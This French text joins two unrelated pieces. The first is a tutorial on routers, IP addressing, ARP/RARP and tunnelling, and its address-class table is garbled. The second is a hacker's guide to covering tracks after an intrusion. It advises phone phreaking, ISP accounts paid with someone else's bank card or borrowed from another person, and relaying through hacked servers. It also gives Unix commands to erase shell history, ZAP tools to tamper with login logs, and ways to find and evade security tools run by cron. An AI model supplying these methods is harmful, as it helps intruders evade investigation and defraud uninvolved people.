La technologie des routeurs est basée sur la réalisation d'un protocole de «bout en bout» qui transporte des informations en mode Full Duplex entre deux nœuds. Ce protocole (du moins dans la situation actuelle) est propriétaire (ce qui veut dire que les routeurs doivent provenir du même constructeur). La réalisation d'un routeur multiprotocoles a pour objet de transporter un trafic entre deux nœuds (ou plus) qui appartienne à plusieurs protocoles de haut niveau. Dans la pratique les constructeurs fournissent un interface logiciel permettant de réaliser la translation du protocole externe dans le protocole interne de façon biunivoque. La difficulté du routage (qui rend particulièrement complexe la réalisation de produits) est que cette opération doit être distribuée dans le temps et dans l'espace et que les décisions de routage qui sont prises pour chaque paquet dans les nœuds doivent prendre en compte cette contrainte. Un routeur multiprotocoles doit donc disposer de tables de routage et effectuer en continu les opérations suivantes :

— échange des tables de routage entre les nœuds.
— obligation pour chaque nœud de gérer l'état général du réseau afin de mettre à jour les tables de routage.
— modifier les tables en fonction des états du réseau.

Pour réaliser des routeurs multiprotocoles, il existe deux approches possibles :

— soit un équipement spécifique, connecté sur les réseaux locaux, qui prenne en compte la totalité du trafic et ne route que la partie qui l'intéresse ;
— soit le produit MPR de Novell qui transforme un PC en routeur multiprotocoles (ce PC pouvant être soit dédié à la fonction de routage, soit commun avec le serveur).

Cette dernière solution permet l'interconnexion derouteurs à travers des réseaux longue distance.

Les principes du routage multiprotocoles. Les routeurs multiprotocoles sont destinés à acheminer sur un même support de transmission (liaisons Transfix, Numéris, X25) un trafic appartenant à différents protocoles routables (lP, lPX, etc.) d'une façon transparente pour les utilisateurs finaux. Un routeur est destiné à interconnecter au moins deux réseaux locaux, c'est-à-dire que l'opération de routage consistera à acheminer - d'un nœud à l'autre - des trames Ethernet et/ou des trames Token-Ring, voire FDDI. Les routeurs vont utiliser entre eux un protocole dit « de proche en proche » dont certains sont normalisés et d'autres propriétaires (exemple CISCO avec leur protocole IGRP [Interior Gateway Routing Protocol]). Ces protocoles ont certaines propriétés qui sont, d'une part, la transparence par rapport aux données acheminées et, d'autre part, les possibilités de routage dynamique. Cette dernière propriété consiste à déterminer un certain nombre d'acheminements alternés en cas d'indisponibilité ou de surcharge d'une liaison primaire. Toute la qualité d'un routage consiste dans la façon dont cette opération est effectuée. Le routeur sait reconnaître dans les trames Ethernet et les trames SDLC le protocole de haut niveau auquel il appartient.

Dans un routeur multiprotocoles le logiciel va tester le code protocole de la trame et l'encapsuler dans les paquets du protocole interne (qui vont être acheminés d'un routeur à l'autre dans le cadre d'un protocole de « proche en proche »).

Le routage lP.

L'architecture TCP/IP est devenue un standard en matière d'interconnexion de réseaux. Cette situation est due à la richesse des concepts mis en œuvre ainsi qu'à l'universalité des implémentations disponibles. L'architecture TCP/IP est parfaitement en mesure d'assurer les mêmes fonctions qu'un gestionnaire de réseau local (comme « NetWare » ou « LAN Manager »), c'est-à-dire de serveur de fichiers, de programmes, d'impressions et d'administration du réseau.

L'adressage. Le principe de l'adressage consiste à définir deux champs différents :

— le champ réseau ;
— le champ hôte (ou nœud), le choix de leur taille étant laissé à l'utilisateur.

Un même nœud peut disposer de deux adresses, correspondant à deux rattachements physiques sur deux réseaux différents.

Classes d'adresses. II existe quatre classes d'adresses lP tenant sur 32 bits. chacune d'elles correspondant à une typologie de réseau particulière et dont le principe varie entre ces deux extrêmes :

— beaucoup de réseaux et peu de nœuds ;
— peu de réseaux et beaucoup de nœuds (dits « hôtes »).

Classe Identificateur Adresse réseau Hôte

A 0724 7 24
B 101416 14 16
C 11021 21 8
D 1110

Ce système (qui dépend de la typologie du réseau) définit une adresse totale, fournie par les couches supérieures sur 32 bits, la taille des champs-adresses « physique» et «hôte». Les paquets reçus sont remis à la couche lP et transformés par cette dernière en datagrammes qui vont alors avoir à résoudre deux problèmes importants :

— la résolution des adresses ;
— la transmission.

En premier lieu il faut établir une correspondance entre l'adresse lP et l'adresse physique (exemple, carte Ethernet tenant en 48 bits). Le mécanisme de résolution d'adresses (connu sous le nom de protocole ARP [Address Resolution Protocol]) se chargera, par dialogue, d'effectuer une correspondance entre les deux adresses (physique et logique). En second lieu il faut

résoudre le problème de la mise en relation entre l'adresse IP et celle de l'interface du PC (cette opération est à effectuer au moment de l'installation du logiciel). Un même « hôte » est en mesure de disposer de plusieurs adresses correspondant à des rattachements différents (c'est le cas des postes situés en position de passerelle ou de routeur). Les critères de choix d'un mode

d'adressage sont les suivants :

— Dans le cas où le réseau aura à se connecter sur un réseau public (Internet), l'adressage devra être conforme à celui du NIC (Network Information Center), et une demande d'homologation devra être transmise à l'INRIA (Institut national de la recherche en informatique et en automatique).
— Dans le cas où le réseau devra rester entièrement privé, nous recommandons de définir un réseau physique par département (les réseaux communiqueront entre eux par des « pc-Passerelles »). Toute remise en cause ultérieure pouvant être douloureuse, il faudra dans tous les cas prendre son temps avant de définir ce plan !

Sous-réseau. La manipulation du plan d'adressage peut présenter des contraintes lourdes d'exploitation. C'est la raison pour laquelle le concept du sous-réseau a été introduit. Le principe consiste à définir certains bits de l'adresse-réseau comme appartenant - pour le nœud considéré - à un sous-réseau et à associer un masque de taille égale à l'adresse IP dont la signification est la suivante :

— à chaque bit du masque égal à l, le bit correspondant de l'adresse IP est dit appartenir à une adresse-réseau ;
— à chaque bit du masque égal à 0, le bit correspondant de l'adresse IP est dit appartenir à un sous-réseau.

Masques de sous-réseau. Un réseau (au sens IP) a besoin d'une adresse qui lui soit spécifique ; la taille de son champ étant parfois insuffisante pour décrire le réseau il est possible de prendre des bits appartenant à l'adresse-hôte et de les allouer à l'adresse-réseau ou vice versa, ce qui conduit à déterminer un nouveau schéma d'adressage pour le sous-réseau. Pour effectuer cette modification du système d'adressage, on utilise la notion de « masque binaire », directement associé à l'adresse IP. Son principe est de définir une suite de bits = l (qui constitueront l'adresse-réseau) et de bits = 0 (qui constitueront l'adresse-hôte) que l'on désignera sous le nom de sous-réseau et à partir de laquelle on pourra effectuer les opérations de routage internes au réseau.

Protocole ARP. Chaque nœud dispose d'au moins une adresse IP ; cependant, sur un réseau donné, deux nœuds ne peuvent communiquer que s'ils disposent d'adresses réelles, reconnues par les ports de communication. Pour transmettre un paquet, le nœud émetteur doit effectuer une opération dite de mapping entre l'adresse IP et l'adresse physique. Ce problème dit « de

résolution d'adresse » a été réglé par la définition d'algorithmes de bas niveau. Une difficulté réside encore dans la structure des champs d'adressage qui ne sont pas compatibles (Ethernet a une adresse physique comportant 48 bits et IP n'en comporte que 32). Le protocole ARP (Address Resolution Protocol) est basé sur le principe suivant :

— Lorsqu'une station du réseau a besoin de connaître l'adresse physique d'une autre (alors qu'elle ne connaît que son adresse IP), elle transmet sous la forme d'un broadcast.
— La station réceptrice, reconnaissant son adresse IP, retransmet à l'émetteur son adresse physique, lequel la stocke alors dans la mémoire-cache du nœud.
— Le protocole ARP permet donc à un émetteur de connaître l'adresse physique du destinataire alors qu'il ne dispose que de son adresse IP.

Protocole RARP. Comme il existe des stations ne disposant pas d'unité où ils pourraient stocker les adresses physiques des nœuds de destination, un protocole complémentaire - RARP (Reverse Address Resolution Protocol) - a été développé qui non seulement en tient compte, mais, de plus, limite la transmission de paquets sur le réseau (opération toujours coûteuse). Ce protocole est basé sur le principe suivant lequel, si la station qui demande une adresse physique a un destinataire, celui-ci aura vraisemblablement à demander l'adresse physique de l'émetteur. Le protocole transmet donc - à l'ensemble du réseau et dans le même paquet - l'adresse IP et l'adresse physique de l'émetteur; les stations se présentant comme des serveurs RARP retransmettent leurs adresses (IP et physique) dans leur réponse.

Le routage des datagrammes. Le datagramme se présente comme un paquet transmis sur le réseau en mode dit «non connecté» (c'est-à-dire que deux paquets envoyés vers une même destination sont susceptibles de prendre deux cheminements différents). Cette situation est facile à mettre en évidence. On écrit deux programmes pour deux stations reliées à un même réseau :

— le premier programme pour transmettre des paquets en mode « datagramme » dans une boucle ;
— le second programme pour les lire et les afficher.

On s'aperçoit alors que sur 5 000 paquets transmis un certain nombre ne parviennent jamais, et que beaucoup arrivent dans le désordre. C'est la raison pour laquelle on a mis au point une technique dite de l’encapsulage qui consiste à mettre une trame dans une autre, laquelle sera transmise et acquittée (c'est ainsi que l'on encapsule des paquets IP dans des trames X25, en utilisant la norme dite « RFC 877 »). Le routage est une opération permettant d'acheminer un paquet de données en fonction de son adresse de destination et des tables de routage contenues dans les nœuds routeurs. Cependant, dans un réseau IP, les

interconnexions sont réalisées par des nœuds « Passerelles» (ou Gateway), chacun étant relié à au moins deux réseaux différents (toute machine disposant d'un rattachement physique à au moins deux réseaux est en mesure de se comporter comme une passerelle). Cette distinction entre nœud et passerelle conduit à définir deux types de routage :

— le routage direct qui consiste à transmettre des paquets d'un nœud à l'autre sur un même réseau ;
— le routage indirect qui consiste à transmettre des paquets d'un réseau à l'autre au travers d'une passerelle.

Pour que cette opération puisse se réaliser, tous les nœuds du réseau doivent comporter l'adresse de la passerelle afin que les paquets non destinés au réseau lui soient transmis ; ainsi les paquets transitent de passerelle en passerelle jusqu'à destination. Chaque passerelle contient des tables de routage, accessibles à partir des nœuds passerelles ; dans la mesure où un champ désigne l'adresse du réseau de destination, la structure du routage IP - dont le principe de l'algorithme se base sur le calcul d'adresses dit Next Hope (prochain saut) - se prête particulièrement bien à ce type de mécanisme.

Le routage GGP. La mise en place de mécanismes de routage pose deux problèmes de construction :

— quelles sont les informations à mettre dans les tables de routage ? ;
— comment (dans la mesure où la performance du réseau a un objectif constant) obtenir ces informations ?

Le principe de leur construction reste celui de la passerelle et se présente comme un nœud installé entre les réseaux. Le routage s'effectue à partir des informations contenues dans les tables. Ces dernières contiennent des adresses de réseau (en fait d'autres passerelles) et des routes dites « par défaut » (c'est-à-dire des adresses de passerelles).

L’IP Tunnelling. Le transport par TCP/IP est devenu non seulement universel, mais également un outil de connexion de protocoles hétérogènes grâce à une technique dite d'encapsulage qui consiste à mettre les données d'un protocole externe dans des paquets IP et à les reconstituer sur des nœuds de destination. Lorsqu'il s'agit à' encapsuler des protocoles dits « non routables», il faut présenter aux couches supérieures l'équivalent de ce qui est une ligne. La technique dite de Tunnelling (utilisée pour acheminer un trafic SNA [Systems Network Architecture] ou DECNET [Digital Equipment Corporation NETwork]) sur un réseau IP) consiste à créer un circuit virtuel entre le routeur d'origine et le routeur de destination que tous les paquets IP - dans lesquels auront été encapsulés les messages du protocole non routable - emprunteront.

Ouf cet article est fini…

Je crois qu’il est assez complet, et présente bien plusieurs aspects de routeurs et du routage.

Ceci est tiré de différents bouquins, eh j’ai quand même pas inventer tout ça, il a bien fallu que je l’apprenne quelque part…

La base de cette partie est écrite par JB34 .

Niveau des communications téléphoniques:

Pour que le provider auquel nous allons nous loguer pour avoir accès à internet ne puisse
avoir notre numéro de téléphone et bien nous n'allons pas lui donner ou même lui en donner
un faux et pourquoi pas en utiliser un faux qu'en plus nous n'allons pas donner. Pour cacher
un numéro de téléphone il existe un numéro à faire avant le numéro à composer c'est le 3651
mais il n'est pas nécessaire de vous dire que des sociétés de télécoms
(elles même qui fournissent ce service) rient devant quelqu'un qui veut
leur cacher son numéro de téléphone grâce à ceci (par contre,
il est intéressant de noter que seul le ministre possède le droit
de lever le numéro 3651, aussi il s’agit d’une protection efficace
car rare seront les cas ou le ministre sera contacté).
Par contre nous pouvons le cacher à d'autre sociétés, des sociétés qui ont par exemple des PBX.
Il est possible de faire un outdial a partir d’un PBX. Pour en savoir plus sur les PBX et sur les VMB,
lisez ça. Un outdial sur un PBX couplé au 3651 fait une protection au niveau téléphonique
très acceptable. Il existe aussi d'autres méthodes qui permettent d'être safe comme le beige boxing,
le blue boxing... en fait toute technique qui permet de ne pas téléphoner de chez vous ou de passer
par un autre endroit avant de manière à ce que le provider internet n'ait pas votre vrai numéro de
téléphone.

Niveau du provider:

Là vous ne prenez pas votre compte personnel avec vos infos personnelles
(si vous les avez données au provider bien sûr) mais plutôt un compte fake
(faux) que vous venez de créer avec une carte bancaire qui ne vous appartient
pas ou souscrivez un abonnement chez un provider gratuit (ça pullule en ce moment).
Encore mieux (en tout cas moi je trouve), utilisez le compte d'une autre personne.
Il se peut que cela attire des ennuis a cette personne mais cela sera moins grillé et
aura l'intérêt d'égarer un peu plus les pistes. De plus dans le cas d'un hack vraiment
chaud cela pourra vous donner la température et l'avance des recherches lancées contre vous
(enfin faut s'attaquer à un gros morceau pour ça).

Niveau d'Internet:

Là les méthodes sont des plus variées et des plus sophistiquées.
Vous pouvez passer par des proxy, des wingates, des anonymisers,
des socks, faire des triangulations avec des paquets fake, utiliser des serveurs non surveillés
et récemment hackés sur lequel vous avez gardé un shell (ça c'est bien parce qu'en plus vous serez
maître des traces qui restent et pourrez même en créer de fausses renvoyant autre part) ...

Niveau de la Cible:

Là il faut effacer un maximum de traces (toutes ci possibles) et en créer des fausses pourquoi pas.
N'en créez pas de fausses si vous voulez passer incognito mais si vous avez changé la page du serveur
web par "3lit3 W4rRi0r Att4ck", pour l'incognito c'est loupé alors faites les partir sur une fausse
piste (fausse ip, date, heure et login ...). Par contre ne crashez pas le serveur pour être sûr de
ne pas être retrouvé car ce ne serait même pas sûr et vous risqueriez beaucoup plus en cas de procès.
Traquez aussi l'utilité des programmes lancés sur le serveur en faisant un "ps -aux" pour voir s'il n'y
aurait pas un programme qui vous parraîtrait susceptible d'enregistrer des logs ou de les envoyer vers
d'autres serveurs. Pour ca faut s'y connaitre en programmation ou alors sniffer le réseau si vous avez
du temps. Bref pour éviter la trace vaut mieux en connaître un bout dans pas mal de domaines.

Voici comment effacer ses traces sous unix :

1. Ne rien laisser dans les répertoires HOME et TEMP des serveurs

2. Lister tous les éléments modifiés avant de se déconnecter : ls -altr

3. Utiliser les commandes csh suivantes pour effacer les données d'historique sans laisser de trace :

mv .logout save.1
echo rm .history>.logout
echo rm .logout>>.logout
echo mv save.1 logout>>.logout

4. Nettoyer les fichiers "logs" des serveurs : Sous Unix il faut connaître au moins 3 fichiers

importants:

WTMP - chaque connexion/déconnexion avec l'heure, le serveur et le terminal concerné
UTMP - tous les utilisateurs connectés à un moment donné
LASTLOG - origine des connexions

L'admin peut utiliser ces fichiers pour les commandes statistiques (lastlogin), pour par exemple savoir quand a eu lieu l'intrusion et puis le temps estimé de l'attaque (tout pour vous retrouver). Il faut savoir aussi que toutes les connexions par ftp, rlogin, telnet sont enregistrées dans ces fichiers. Mais ne pas effacer ces fichiers car l'admin saura immédiatement que l'intrusion a eu lieu. Pour vous simplifier la tâche utiliser un prog de modification de ces fichiers: ZAP ou ZAP2 (remplace la dernière donnée de connexion par des 00000000).

Recommandation: pour modifier le LASTLOG sans toucher au fichier, une fois connecté, lancer un rlogin "serveur cible" avec le login et pass du compte utilisateur hacké. Cela a pour effet d'enregistrer un LASTLOGIN à partir du serveur et non à partir de l'extérieur.

Normalement ces modifs sont possibles que par le ROOT. Mais si le ROOT n'a pas été obtenu, il suffit pour certaines version d'Unix de faire un login lors de votre connexion sur le serveur pour modifier le LASTLOG.

5.Trouver touus les fichiers modifiés après la connexion: juste après être connecté faire: "touch /tmp/check" avant de continuer à travailler. Par la suite faire: "find / -newer /tmpcheck -print" ou "find / -ctime 0 -print" ou encore "find / -cmin 0 -print", vérifier les fichiers d'audit et les modifier.

6. Vérifier les répertoires s par défaut: /usr/adm , /var/adm , /var/log

7. Manipuler les prg de sécurité installés: Sur les serveurs sécurisés, les prg de sécurité sont lancés à intervalles périodiques par cron. Ces programmes vérifient les tailles de fichiers ou analysent les logs serveurs. Ils peuvent également être stockés dans les répertoires /adm ou ~bin (pour les sniffers).

Accéder aux paramètres de cron. Le rep par défaut est /var/spool/cron/crontabs. Vérifiez toutes les entrées surtout les fichiers "root" et analysez les prgs lancés. Faire par exemple: "crontab -l root". Les prgs de sécurité sont en général: tiger, spi, tripwire, 15, binaudit, hobgoblin, s3, ... voilà bon là normalement vous pouvez être tranquil mais bon on est jamais trop prudent et faut se dire qu'il y a toujours plus malin que nous. Je ne cesse pas de le dire mais ne négligez pas la victime qui elle aussi peut s'y connaître en hack alors n'effacez rien et n'abîmez aucune donnée. Car un HACKER n'est pas un CRACKER...

Donc, en conclusion, soyez parano, et surtout même si la cible paraît peu importante, n’hésitez pas à prendre toutes les précautions possibles. De plus, ne soyez pas con et n’utilisez pas bêtement des programmes parfois efficaces mais qui ne sont pas safe du tout.